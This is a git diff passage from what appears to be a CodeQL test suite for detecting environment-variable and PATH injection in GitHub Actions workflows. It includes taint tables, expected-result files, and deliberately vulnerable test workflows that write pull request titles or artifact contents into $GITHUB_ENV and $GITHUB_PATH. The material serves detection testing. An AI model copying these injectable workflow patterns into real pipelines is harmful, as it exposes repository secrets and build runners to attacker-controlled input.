| +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | +| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | +| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | +| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | +| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | +| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | +| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | +| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | +| linkerd/linkerd2 | * | input.component | output.image | taint | manual | +| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | +| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | +| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | +| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | +| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | +| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | +| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | +| novuhq/novu | * | input.docker_name | output.image | taint | manual | +| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | +| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | +| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | +| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | +| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | +| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | +| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | +| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | +| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | +calls +| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | +needs +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +testNormalizeExpr +| foo['bar'] == baz | foo.bar == baz | +| github.event.pull_request.user["login"] | github.event.pull_request.user.login | +| github.event.pull_request.user['login'] | github.event.pull_request.user.login | +| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv +| id1 | $( { - return artifact.name == "oc-code-coverage" - })[0]; - let download = await github.rest.actions.downloadArtifact({ - owner: context.repo.owner, - repo: context.repo.repo, - artifact_id: matchArtifact.id, - archive_format: 'zip', - }); - let fs = require('fs'); - fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); - - name: 'Unzip code coverage' - run: unzip oc-code-coverage.zip -d coverage - - name: set env vars - run: | - echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV - echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV - echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV - # on develop branch, only run a baseline scan - - name: SonarCloud Scan (Baseline) - uses: sonarsource/sonarcloud-github-action@master - if: env.SONAR_HEAD == 'develop' - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} - with: - args: > - -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} - -Dsonar.projectKey=opencost_opencost - -Dsonar.organization=opencost - -Dsonar.branch.name=develop - -Dsonar.branch.target=develop - - uses: actions/github-script@v6 - with: - script: | - print("${{enb.SONAR_PR_NUM}}") - - name: SonarCloud Scan (PR) - uses: sonarsource/sonarcloud-github-action@master - if: env.SONAR_HEAD != 'develop' - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} - with: - args: > - -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} - -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }} - -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} - -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} - -Dsonar.projectKey=opencost_opencost - -Dsonar.organization=opencost diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml index 3cab86f3171b..c3c94755efd6 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml @@ -1,27 +1,13 @@ -name: Pull Request Open +name: Test on: pull_request_target: - branches: - - main - - 14.0.x - - types: - - opened - - reopened jobs: - updateJira: - if: github.actor != 'dependabot[bot]' + test: runs-on: ubuntu-latest steps: - - name: Checkout repository - uses: actions/checkout@v4 - - - name: Extract Jira Key + - name: Code Injection, do not report as ENV VAR INJ run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV - - name: Sink - run: echo ${{ env.ISSUE_KEY }} - diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml index e71178c4ad66..c902b7e61bd2 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml @@ -1,6 +1,4 @@ -# https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0 -# https://github.com/firebase/friendlyeats-web/commit/df65aefd24cf6f092a27a5576067ff9f29aa2ef1 -name: Deploy Preview +name: Test on: workflow_run: workflows: ["Generate Preview"] @@ -8,11 +6,8 @@ on: - completed jobs: - deploy: + test: runs-on: ubuntu-latest - if: > - ${{ github.event.workflow_run.event == 'pull_request' && - github.event.workflow_run.conclusion == 'success' }} steps: - name: 'Download artifact' uses: actions/github-script@v3.1.0 @@ -43,31 +38,6 @@ jobs: }); var fs = require('fs'); fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(downloadPr.data)); - fs.writeFileSync('${{github.workspace}}/firestore-web.zip', Buffer.from(downloadPreview.data)); - run: | unzip pr.zip echo "pr_number=$(cat NR)" >> $GITHUB_ENV - mkdir firestore-web - unzip firestore-web.zip -d firestore-web - - name: Deploy preview - id: deploy_preview - uses: FirebaseExtended/action-hosting-deploy@v0 - with: - repoToken: '${{ secrets.GITHUB_TOKEN }}' - firebaseServiceAccount: '${{ secrets.FIREBASE_SERVICE_ACCOUNT_FIR_CODELABS_89252 }}' - projectId: fir-codelabs-89252 - entryPoint: firestore-web - channelId: firestore-web-${{ env.pr_number }} - env: - FIREBASE_CLI_PREVIEWS: hostingchannels - - name: Write Comment - uses: actions/github-script@v3 - with: - github-token: ${{ secrets.GITHUB_TOKEN }} - script: | - await github.issues.createComment({ - owner: context.repo.owner, - repo: context.repo.repo, - issue_number: ${{ env.pr_number }}, - body: 'View preview ${{ steps.deploy_preview.outputs.details_url }}' - }); diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml index 2f76d4a3042a..f76454c6088f 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml @@ -1,17 +1,13 @@ -# https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project -# https://github.com/google/orbit/commit/6cd71a3f1eec098d0de61bf9bb742737cb3aa5fa -name: report-checks +name: Test on: workflow_run: workflows: ['checks'] types: - completed -permissions: read-all + jobs: - report-clang-tidy-diff: - permissions: - pull-requests: write + test: runs-on: ubuntu-latest steps: - name: Download PR metadata @@ -21,44 +17,7 @@ jobs: workflow_conclusion: '' name: pr_metadata if_no_artifact_found: 'ignore' - - name: Download clang_tidy_fixes - uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 - with: - workflow: ${{ github.event.workflow_run.workflow_id }} - workflow_conclusion: '' - name: clang_tidy_fixes - if_no_artifact_found: 'ignore' - - name: Set found_files - id: set_found_files - run: | - if [ -f clang-tidy-fixes.yml ] && [ -f pr_number.txt ] && [ -f pr_head_repo.txt ] && [ -f pr_head_ref.txt ]; then - echo "found_files=true" >> $GITHUB_OUTPUT - else - echo "found_files=false" >> $GITHUB_OUTPUT - fi - run: | echo "PR_NUMBER=$(cat pr_number.txt | jq -r .)" >> $GITHUB_ENV echo "PR_HEAD_REPO=$(cat pr_head_repo.txt | jq -Rr .)" >> $GITHUB_ENV echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV - if: steps.set_found_files.outputs.found_files == 'true' - - uses: actions/checkout@v3 - if: steps.set_found_files.outputs.found_files == 'true' - with: - repository: ${{ env.PR_HEAD_REPO }} - ref: ${{ env.PR_HEAD_REF }} - persist-credentials: false - - name: Redownload clang_tidy_fixes - if: steps.set_found_files.outputs.found_files == 'true' - uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 - with: - workflow: ${{ github.event.workflow_run.workflow_id }} - workflow_conclusion: '' - name: clang_tidy_fixes - if_no_artifact_found: 'ignore' - - uses: platisd/clang-tidy-pr-comments@89ea1b828cdac1a6ec993d225972adea3b8841b6 - if: steps.set_found_files.outputs.found_files == 'true' - with: - github_token: ${{ secrets.ORBITPROFILER_BOT_PAT }} - clang_tidy_fixes: clang-tidy-fixes.yml - pull_request_id: ${{ env.PR_NUMBER }} - diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index 1e4542b63189..733b15fc9564 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -1,23 +1,20 @@ -name: Pull Request Open +name: Test on: pull_request_target: - branches: - - main - - 14.0.x - - types: - - opened - - reopened jobs: - updateJira: - if: github.actor != 'dependabot[bot]' + test: runs-on: ubuntu-latest steps: - - name: Checkout repository - uses: actions/checkout@v4 - + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PR_TITLE=$TITLE" >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV - env: TITLE: ${{ github.event.pull_request.title }} run: | @@ -42,9 +39,11 @@ jobs: echo "$TITLE" >> "$GITHUB_ENV" echo EOF } >> "$GITHUB_ENV" - - run: | + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | cat <<-"EOF" >> "$GITHUB_ENV" - echo "$TITLE" + echo "FOO=$TITLE" EOF diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml new file mode 100644 index 000000000000..cfc5e6ef1fa5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml @@ -0,0 +1,36 @@ +name: Test +on: + workflow_run: + workflows: ["Build/Test"] + types: [completed] +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: 'Download code coverage' + uses: actions/github-script@v7 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "oc-code-coverage" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); + - name: 'Unzip code coverage' + run: unzip oc-code-coverage.zip -d coverage + - name: set env vars + run: | + echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV + echo "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV + echo "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected index 6d9801ccd819..d3b90de71e32 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected @@ -1,10 +1,20 @@ edges -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:9:26:6 | Run Step | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:26:9:29:41 | Run Step | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | nodes -| .github/workflows/path1.yml:11:21:11:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | semmle.label | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | semmle.label | echo ${PATHINJ} >> $GITHUB_PATH | | .github/workflows/path1.yml:21:9:25:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/path1.yml:25:9:26:6 | Run Step | semmle.label | Run Step | -| .github/workflows/path1.yml:26:9:29:41 | Run Step | semmle.label | Run Step | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | semmle.label | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 0c4574a77cbb..56345ca896a8 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -1,16 +1,31 @@ edges -| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | -| .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | -| .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | -| .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes -| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test2.yml:17:9:47:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test2.yml:47:9:52:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | semmle.label | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected new file mode 100644 index 000000000000..2dfa8702d591 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected @@ -0,0 +1,26 @@ +edges +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +nodes +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | semmle.label | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | semmle.label | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | semmle.label | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | +subpaths +#select +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref 